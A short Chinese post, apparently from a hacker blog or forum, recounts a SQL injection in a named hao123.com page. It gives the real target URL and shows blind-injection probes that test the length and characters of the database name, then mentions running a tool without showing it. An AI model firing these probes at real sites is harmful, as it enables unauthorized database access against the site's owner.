SO。。。刚刚在传说中的乌云漏洞提交平台看到有人贴出的hao123 的 Sql Injection 。
我就不存档了 存着也不会有妹子出来。 拿出来发了 不知道那位老兄报的是不是这个点。
target:
http://www.hao123.com/friends/index_blessing.php?id=2608
基本判定是 Integer 型
union select 1,2,3,4,.................无果.
于是乎:盲注
//判断数据库的长度
Length((database()))=?+and+'x'='x
ascii(substring((database()),2,1))=数字+and+'x'='x
......
盲注纯属体力活..相信大家都会.
我们直接跑工具.
看兵器:
此文纯属聊天扯蛋.